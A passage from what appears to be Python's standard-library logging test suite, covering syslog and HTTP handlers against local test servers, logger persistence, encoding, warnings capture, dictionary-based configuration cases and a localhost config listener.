            self.skipTest(self.server_exception)
        # The log message sent to the SysLogHandler is properly received.
        logger = logging.getLogger("slh")
        logger.error("sp\xe4m")
        self.handled.wait()
        # <11> is the priority for facility LOG_USER, severity ERROR.
        self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
        self.handled.clear()
        self.sl_hdlr.append_nul = False
        logger.error("sp\xe4m")
        self.handled.wait()
        self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
        self.handled.clear()
        self.sl_hdlr.ident = "h\xe4m-"
        logger.error("sp\xe4m")
        self.handled.wait()
        self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):

    """Test for SysLogHandler with Unix sockets."""

    if hasattr(socket, "AF_UNIX"):
        server_class = TestUnixDatagramServer

    def setUp(self):
        # override the definition in the base class
        self.address = _get_temp_domain_socket()
        SysLogHandlerTest.setUp(self)

    def tearDown(self):
        SysLogHandlerTest.tearDown(self)
        # Remove the socket file created for this test.
        support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
                     'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):

    """Test for SysLogHandler with IPv6 host."""

    server_class = TestUDPServer
    address = ('::1', 0)

    def setUp(self):
        # Force the shared server class onto IPv6 for the duration of
        # this test; tearDown restores IPv4.
        self.server_class.address_family = socket.AF_INET6
        super(IPv6SysLogHandlerTest, self).setUp()

    def tearDown(self):
        self.server_class.address_family = socket.AF_INET
        super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
    """Test for HTTPHandler, over both plain HTTP and HTTPS."""

    def setUp(self):
        """Set up an HTTP server to receive log messages, and a HTTPHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        self.handled = threading.Event()

    def handle_request(self, request):
        # Record the request details for the assertions in test_output.
        self.command = request.command
        self.log_data = urlparse(request.path)
        if self.command == 'POST':
            try:
                rlen = int(request.headers['Content-Length'])
                self.post_data = request.rfile.read(rlen)
            except:
                self.post_data = None
        request.send_response(200)
        request.end_headers()
        self.handled.set()

    def test_output(self):
        # The log message sent to the HTTPHandler is properly received.
        logger = logging.getLogger("http")
        root_logger = self.root_logger
        root_logger.removeHandler(self.root_logger.handlers[0])
        for secure in (False, True):
            addr = ('localhost', 0)
            if secure:
                try:
                    import ssl
                except ImportError:
                    sslctx = None
                else:
                    here = os.path.dirname(__file__)
                    localhost_cert = os.path.join(here, "keycert.pem")
                    sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
                    sslctx.load_cert_chain(localhost_cert)

                    context = ssl.create_default_context(cafile=localhost_cert)
            else:
                sslctx = None
                context = None
            self.server = server = TestHTTPServer(addr, self.handle_request,
                                                  0.01, sslctx=sslctx)
            server.start()
            server.ready.wait()
            host = 'localhost:%d' % server.server_port
            secure_client = secure and sslctx
            self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
                                                       secure=secure_client,
                                                       context=context,
                                                       credentials=('foo', 'bar'))
            self.log_data = None
            root_logger.addHandler(self.h_hdlr)

            for method in ('GET', 'POST'):
                self.h_hdlr.method = method
                self.handled.clear()
                msg = "sp\xe4m"
                logger.error(msg)
                self.handled.wait()
                self.assertEqual(self.log_data.path, '/frob')
                self.assertEqual(self.command, method)
                if method == 'GET':
                    d = parse_qs(self.log_data.query)
                else:
                    d = parse_qs(self.post_data.decode('utf-8'))
                self.assertEqual(d['name'], ['http'])
                self.assertEqual(d['funcName'], ['test_output'])
                self.assertEqual(d['msg'], [msg])

            self.server.stop(2.0)
            self.root_logger.removeHandler(self.h_hdlr)
            self.h_hdlr.close()
class MemoryTest(BaseTest):
    """Test that loggers are kept alive even when all user references die."""
    def setUp(self):
        BaseTest.setUp(self)
        # Maps (id, repr) of a watched object to a weak reference to it,
        # so survival can be checked without keeping the object alive.
        self._survivors = {}
    def _watch_for_survival(self, *args):
        # Register weak references to the given objects.
        for obj in args:
            key = id(obj), repr(obj)
            self._survivors[key] = weakref.ref(obj)
    def _assertTruesurvival(self):
        # Assert that every watched object is still alive.
        # Trigger cycle breaking.
        gc.collect()
        dead = []
        for (id_, repr_), ref in self._survivors.items():
            if ref() is None:
                dead.append(repr_)
        if dead:
            self.fail("%d objects should have survived "
                "but have been destroyed: %s" % (len(dead), ", ".join(dead)))
    def test_persistent_loggers(self):
        # Logger objects are persistent and retain their configuration, even
        # if visible references are destroyed.
        self.root_logger.setLevel(logging.INFO)
        foo = logging.getLogger("foo")
        self._watch_for_survival(foo)
        foo.setLevel(logging.DEBUG)
        self.root_logger.debug(self.next_message())
        foo.debug(self.next_message())
        self.assert_log_lines([
            ('foo', 'DEBUG', '2'),
        ])
        del foo
        # foo has survived.
        self._assertTruesurvival()
        # foo has retained its settings.
        bar = logging.getLogger("foo")
        bar.debug(self.next_message())
        self.assert_log_lines([
            ('foo', 'DEBUG', '2'),
            ('foo', 'DEBUG', '3'),
        ])
class EncodingTest(BaseTest):
    """Test that non-ASCII data is written correctly through handlers."""
    def test_encoding_plain_file(self):
        # In Python 2.x, a plain file object is treated as having no encoding.
        log = logging.getLogger("test")
        fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
        os.close(fd)
        # the non-ascii data we write to the log.
        data = "foo\x80"
        try:
            handler = logging.FileHandler(fn, encoding="utf-8")
            log.addHandler(handler)
            try:
                # write non-ascii data to the log.
                log.warning(data)
            finally:
                log.removeHandler(handler)
                handler.close()
            # check we wrote exactly those bytes, ignoring trailing \n etc
            f = open(fn, encoding="utf-8")
            try:
                self.assertEqual(f.read().rstrip(), data)
            finally:
                f.close()
        finally:
            if os.path.isfile(fn):
                os.remove(fn)
    def test_encoding_cyrillic_unicode(self):
        # A unicode message routed through a cp1251 stream writer must come
        # out encoded in cp1251 bytes.
        log = logging.getLogger("test")
        # Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
        message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
        # Ensure it's written in a Cyrillic encoding
        writer_class = codecs.getwriter('cp1251')
        writer_class.encoding = 'cp1251'
        stream = io.BytesIO()
        writer = writer_class(stream, 'strict')
        handler = logging.StreamHandler(writer)
        log.addHandler(handler)
        try:
            log.warning(message)
        finally:
            log.removeHandler(handler)
            handler.close()
        # check we wrote the Cyrillic bytes plus the handler's terminator.
        s = stream.getvalue()
        self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
    """Test logging.captureWarnings() routing warnings to the py.warnings logger."""
    def test_warnings(self):
        with warnings.catch_warnings():
            logging.captureWarnings(True)
            self.addCleanup(logging.captureWarnings, False)
            warnings.filterwarnings("always", category=UserWarning)
            stream = io.StringIO()
            h = logging.StreamHandler(stream)
            logger = logging.getLogger("py.warnings")
            logger.addHandler(h)
            warnings.warn("I'm warning you...")
            logger.removeHandler(h)
            s = stream.getvalue()
            h.close()
            # The captured warning is formatted and emitted via the logger.
            self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
            # When a file is supplied, showwarning() writes to it directly
            # and bypasses the logging machinery.
            a_file = io.StringIO()
            warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
                                 a_file, "Dummy line")
            s = a_file.getvalue()
            a_file.close()
            self.assertEqual(s,
                "dummy.py:42: UserWarning: Explicit\n  Dummy line\n")
    def test_warnings_no_handlers(self):
        with warnings.catch_warnings():
            logging.captureWarnings(True)
            self.addCleanup(logging.captureWarnings, False)
            # confirm our assumption: no loggers are set
            logger = logging.getLogger("py.warnings")
            self.assertEqual(logger.handlers, [])
            warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
            # A NullHandler is added lazily so the warning is not lost noisily.
            self.assertEqual(len(logger.handlers), 1)
            self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
    """Factory referenced by name in dict-config tests: build a Formatter."""
    formatter = logging.Formatter(format, datefmt)
    return formatter
def handlerFunc():
    """Factory referenced by name in dict-config tests: a plain StreamHandler."""
    handler = logging.StreamHandler()
    return handler
class CustomHandler(logging.StreamHandler):
    """StreamHandler subclass instantiated by class name in dict-config tests."""
class ConfigDictTest(BaseTest):
    """Reading logging config from a dictionary via logging.config.dictConfig()."""
    check_no_resource_warning = support.check_no_resource_warning
    expected_log_pat = r"^(\w+) \+\+ (\w+)$"
    # config0 is a standard configuration: one formatter, one stdout
    # handler, attached to the root logger.
    config0 = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'root' : {
            'level' : 'WARNING',
            'handlers' : ['hand1'],
        },
    }
    # config1 adds a sub-logger ("compiler.parser") owning the handler.
    config1 = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config1a is like config1, but the handler lives on the root logger and
    # the sub-logger relies on propagation.
    config1a = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
            },
        },
        'root' : {
            'level' : 'WARNING',
            'handlers' : ['hand1'],
        },
    }
    # config2 has a non-existent stream ('sys.stdbout') and so should raise.
    config2 = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdbout',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config2a has an invalid handler level ('NTOSET') and so should raise.
    config2a = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NTOSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config2b has an invalid root level ('WRANING') and so should raise.
    config2b = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WRANING',
        },
    }
    # config3 references a formatter that is not defined, and so should raise.
    config3 = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'misspelled_name',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config4 specifies a custom formatter class (by dotted name, via '()').
    config4 = {
        'version': 1,
        'formatters': {
            'form1' : {
                '()' : __name__ + '.ExceptionFormatter',
                'format' : '%(levelname)s:%(name)s:%(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'root' : {
            'level' : 'NOTSET',
            'handlers' : ['hand1'],
        },
    }
    # config4a is like config4, but passes factories as actual callables and
    # as dotted names of plain functions, plus a handler factory.
    config4a = {
        'version': 1,
        'formatters': {
            'form1' : {
                '()' : ExceptionFormatter,
                'format' : '%(levelname)s:%(name)s:%(message)s',
            },
            'form2' : {
                '()' : __name__ + '.formatFunc',
                'format' : '%(levelname)s:%(name)s:%(message)s',
            },
            'form3' : {
                '()' : formatFunc,
                'format' : '%(levelname)s:%(name)s:%(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
            'hand2' : {
                '()' : handlerFunc,
            },
        },
        'root' : {
            'level' : 'NOTSET',
            'handlers' : ['hand1'],
        },
    }
    # config5 specifies a custom handler class to be loaded by dotted name.
    config5 = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : __name__ + '.CustomHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config6 passes an invalid keyword ('9') to the handler constructor
    # and so should raise.
    config6 = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : __name__ + '.CustomHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
                '9' : 'invalid parameter name',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config7 replaces config1's 'compiler.parser' logger with
    # 'compiler.lexer', so applying it after config1 disables the former.
    config7 = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'loggers' : {
            'compiler.lexer' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config8 defines both compiler and compiler.lexer without disabling
    # pre-existing loggers.
    config8 = {
        'version': 1,
        'disable_existing_loggers' : False,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'loggers' : {
            'compiler' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
            'compiler.lexer' : {
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config8a is like config8 but explicitly disables existing loggers;
    # child loggers of configured ones are still kept enabled.
    config8a = {
        'version': 1,
        'disable_existing_loggers' : True,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'loggers' : {
            'compiler' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
            'compiler.lexer' : {
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config9/9a/9b exercise incremental updates of handler/logger levels.
    config9 = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'WARNING',
                'stream' : 'ext://sys.stdout',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'WARNING',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'NOTSET',
        },
    }
    config9a = {
        'version': 1,
        'incremental' : True,
        'handlers' : {
            'hand1' : {
                'level' : 'WARNING',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'INFO',
            },
        },
    }
    config9b = {
        'version': 1,
        'incremental' : True,
        'handlers' : {
            'hand1' : {
                'level' : 'INFO',
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'INFO',
            },
        },
    }
    # config10 uses a filter attached to both a handler and a logger, so
    # only records from the 'compiler.parser' subtree get through.
    config10 = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'filters' : {
            'filt1' : {
                'name' : 'compiler.parser',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
                'filters' : ['filt1'],
            },
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'filters' : ['filt1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
            'handlers' : ['hand1'],
        },
    }
    # config11 refers to formatter/handler definitions indirectly via
    # cfg:// URLs into other keys of the same dict.
    config11 = {
        'version': 1,
        'true_formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handler_configs': {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'formatters' : 'cfg://true_formatters',
        'handlers' : {
            'hand1' : 'cfg://handler_configs[hand1]',
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config12 lacks the mandatory 'version' key and so should raise.
    config12 = {
        'true_formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handler_configs': {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'formatters' : 'cfg://true_formatters',
        'handlers' : {
            'hand1' : 'cfg://handler_configs[hand1]',
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config13 declares an unsupported version (2) and so should raise.
    config13 = {
        'version': 2,
        'true_formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handler_configs': {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
            },
        },
        'formatters' : 'cfg://true_formatters',
        'handlers' : {
            'hand1' : 'cfg://handler_configs[hand1]',
        },
        'loggers' : {
            'compiler.parser' : {
                'level' : 'DEBUG',
                'handlers' : ['hand1'],
            },
        },
        'root' : {
            'level' : 'WARNING',
        },
    }
    # config14 sets extra attributes on the handler via the '.' key.
    config14 = {
        'version': 1,
        'formatters': {
            'form1' : {
                'format' : '%(levelname)s ++ %(message)s',
            },
        },
        'handlers' : {
            'hand1' : {
                'class' : 'logging.StreamHandler',
                'formatter' : 'form1',
                'level' : 'NOTSET',
                'stream' : 'ext://sys.stdout',
                '.': {
                    'foo': 'bar',
                    'terminator': '!\n',
                }
            },
        },
        'root' : {
            'level' : 'WARNING',
            'handlers' : ['hand1'],
        },
    }
    # As config1 but with a misspelt level on a handler and a misspelt
    # target on a MemoryHandler: the handler referencing a later-defined
    # target must still resolve (bpo deferred-configuration case).
    out_of_order = {
        "version": 1,
        "formatters": {
            "mySimpleFormatter": {
                "format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
                "style": "$"
            }
        },
        "handlers": {
            "fileGlobal": {
                "class": "logging.StreamHandler",
                "level": "DEBUG",
                "formatter": "mySimpleFormatter"
            },
            "bufferGlobal": {
                "class": "logging.handlers.MemoryHandler",
                "capacity": 5,
                "formatter": "mySimpleFormatter",
                "target": "fileGlobal",
                "level": "DEBUG"
            }
        },
        "loggers": {
            "mymodule": {
                "level": "DEBUG",
                "handlers": ["bufferGlobal"],
                "propagate": "true"
            }
        }
    }
    def apply_config(self, conf):
        # Thin wrapper so subclasses/tests share one entry point.
        logging.config.dictConfig(conf)
    def test_config0_ok(self):
        # A simple config which overrides the default settings.
        with support.captured_stdout() as output:
            self.apply_config(self.config0)
            logger = logging.getLogger()
            # Won't output anything
            logger.info(self.next_message())
            # Outputs a message
            logger.error(self.next_message())
            self.assert_log_lines([
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_config1_ok(self, config=config1):
        # A config defining a sub-parser as well.
        with support.captured_stdout() as output:
            self.apply_config(config)
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_config2_failure(self):
        # A simple config which overrides the default settings.
        self.assertRaises(Exception, self.apply_config, self.config2)
    def test_config2a_failure(self):
        # A simple config which overrides the default settings.
        self.assertRaises(Exception, self.apply_config, self.config2a)
    def test_config2b_failure(self):
        # A simple config which overrides the default settings.
        self.assertRaises(Exception, self.apply_config, self.config2b)
    def test_config3_failure(self):
        # A simple config which overrides the default settings.
        self.assertRaises(Exception, self.apply_config, self.config3)
    def test_config4_ok(self):
        # A config specifying a custom formatter class.
        with support.captured_stdout() as output:
            self.apply_config(self.config4)
            #logger = logging.getLogger()
            try:
                raise RuntimeError()
            except RuntimeError:
                logging.exception("just testing")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue(),
                "ERROR:root:just testing\nGot a [RuntimeError]\n")
            # Original logger output is empty
            self.assert_log_lines([])
    def test_config4a_ok(self):
        # A config specifying a custom formatter class.
        with support.captured_stdout() as output:
            self.apply_config(self.config4a)
            #logger = logging.getLogger()
            try:
                raise RuntimeError()
            except RuntimeError:
                logging.exception("just testing")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue(),
                "ERROR:root:just testing\nGot a [RuntimeError]\n")
            # Original logger output is empty
            self.assert_log_lines([])
    def test_config5_ok(self):
        self.test_config1_ok(config=self.config5)
    def test_config6_failure(self):
        self.assertRaises(Exception, self.apply_config, self.config6)
    def test_config7_ok(self):
        with support.captured_stdout() as output:
            self.apply_config(self.config1)
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
        with support.captured_stdout() as output:
            self.apply_config(self.config7)
            # config7 does not mention compiler.parser, so it is disabled.
            logger = logging.getLogger("compiler.parser")
            self.assertTrue(logger.disabled)
            logger = logging.getLogger("compiler.lexer")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '3'),
                ('ERROR', '4'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    # Same as test_config_7_ok but don't disable old loggers.
    def test_config_8_ok(self):
        with support.captured_stdout() as output:
            self.apply_config(self.config1)
            logger = logging.getLogger("compiler.parser")
            # All will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
        with support.captured_stdout() as output:
            self.apply_config(self.config8)
            logger = logging.getLogger("compiler.parser")
            self.assertFalse(logger.disabled)
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            logger = logging.getLogger("compiler.lexer")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '3'),
                ('ERROR', '4'),
                ('INFO', '5'),
                ('ERROR', '6'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_config_8a_ok(self):
        with support.captured_stdout() as output:
            self.apply_config(self.config1a)
            logger = logging.getLogger("compiler.parser")
            # See issue #11424. compiler-hyphenated sorts
            # between compiler and compiler.xyz and this
            # was preventing compiler.xyz from being included
            # in the child loggers of compiler because of an
            # overzealous loop termination condition.
            hyphenated = logging.getLogger('compiler-hyphenated')
            # All will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
                ('CRITICAL', '3'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
        with support.captured_stdout() as output:
            self.apply_config(self.config8a)
            logger = logging.getLogger("compiler.parser")
            self.assertFalse(logger.disabled)
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            logger = logging.getLogger("compiler.lexer")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            # Will not appear
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '4'),
                ('ERROR', '5'),
                ('INFO', '6'),
                ('ERROR', '7'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_config_9_ok(self):
        with support.captured_stdout() as output:
            self.apply_config(self.config9)
            logger = logging.getLogger("compiler.parser")
            # Nothing will be output since both handler and logger are
            # set to WARNING.
            logger.info(self.next_message())
            self.assert_log_lines([], stream=output)
            self.apply_config(self.config9a)
            # Nothing will be output since handler is still set to WARNING.
            logger.info(self.next_message())
            self.assert_log_lines([], stream=output)
            self.apply_config(self.config9b)
            # Message should now be output.
            logger.info(self.next_message())
            self.assert_log_lines([
                ('INFO', '3'),
            ], stream=output)
    def test_config_10_ok(self):
        with support.captured_stdout() as output:
            self.apply_config(self.config10)
            logger = logging.getLogger("compiler.parser")
            logger.warning(self.next_message())
            logger = logging.getLogger('compiler')
            # Not output, because filtered
            logger.warning(self.next_message())
            logger = logging.getLogger('compiler.lexer')
            # Not output, because filtered
            logger.warning(self.next_message())
            logger = logging.getLogger("compiler.parser.codegen")
            # Output, as not filtered
            logger.error(self.next_message())
            self.assert_log_lines([
                ('WARNING', '1'),
                ('ERROR', '4'),
            ], stream=output)
    def test_config11_ok(self):
        self.test_config1_ok(self.config11)
    def test_config12_failure(self):
        self.assertRaises(Exception, self.apply_config, self.config12)
    def test_config13_failure(self):
        self.assertRaises(Exception, self.apply_config, self.config13)
    def test_config14_ok(self):
        with support.captured_stdout() as output:
            self.apply_config(self.config14)
            h = logging._handlers['hand1']
            # The '.' section set both a new attribute and an existing one.
            self.assertEqual(h.foo, 'bar')
            self.assertEqual(h.terminator, '!\n')
            logging.warning('Exclamation')
            self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
    def test_config15_ok(self):
        # Re-applying a FileHandler config must not leak the old stream.
        def cleanup(h1, fn):
            h1.close()
            os.remove(fn)
        with self.check_no_resource_warning():
            fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
            os.close(fd)
            config = {
                "version": 1,
                "handlers": {
                    "file": {
                        "class": "logging.FileHandler",
                        "filename": fn
                    }
                },
                "root": {
                    "handlers": ["file"]
                }
            }
            self.apply_config(config)
            self.apply_config(config)
        handler = logging.root.handlers[0]
        self.addCleanup(cleanup, handler, fn)
    def setup_via_listener(self, text, verify=None):
        # Start a config-listening thread, push `text` to it over a socket
        # (length-prefixed), then stop the listener.
        text = text.encode("utf-8")
        # Ask for a randomly assigned port (by using port 0)
        t = logging.config.listen(0, verify)
        t.start()
        t.ready.wait()
        # Now get the port allocated
        port = t.port
        t.ready.clear()
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(2.0)
            sock.connect(('localhost', port))
            slen = struct.pack('>L', len(text))
            s = slen + text
            sentsofar = 0
            left = len(s)
            while left > 0:
                sent = sock.send(s[sentsofar:])
                sentsofar += sent
                left -= sent
            sock.close()
        finally:
            t.ready.wait(2.0)
            logging.config.stopListening()
            support.join_thread(t, 2.0)
    def test_listen_config_10_ok(self):
        with support.captured_stdout() as output:
            self.setup_via_listener(json.dumps(self.config10))
            logger = logging.getLogger("compiler.parser")
            logger.warning(self.next_message())
            logger = logging.getLogger('compiler')
            # Not output, because filtered
            logger.warning(self.next_message())
            logger = logging.getLogger('compiler.lexer')
            # Not output, because filtered
            logger.warning(self.next_message())
            logger = logging.getLogger("compiler.parser.codegen")
            # Output, as not filtered
            logger.error(self.next_message())
            self.assert_log_lines([
                ('WARNING', '1'),
                ('ERROR', '4'),
            ], stream=output)
    def test_listen_config_1_ok(self):
        with support.captured_stdout() as output:
            self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_listen_verify(self):
        def verify_fail(stuff):
            # Rejects every payload; the config must not be applied.
            return None
        def verify_reverse(stuff):
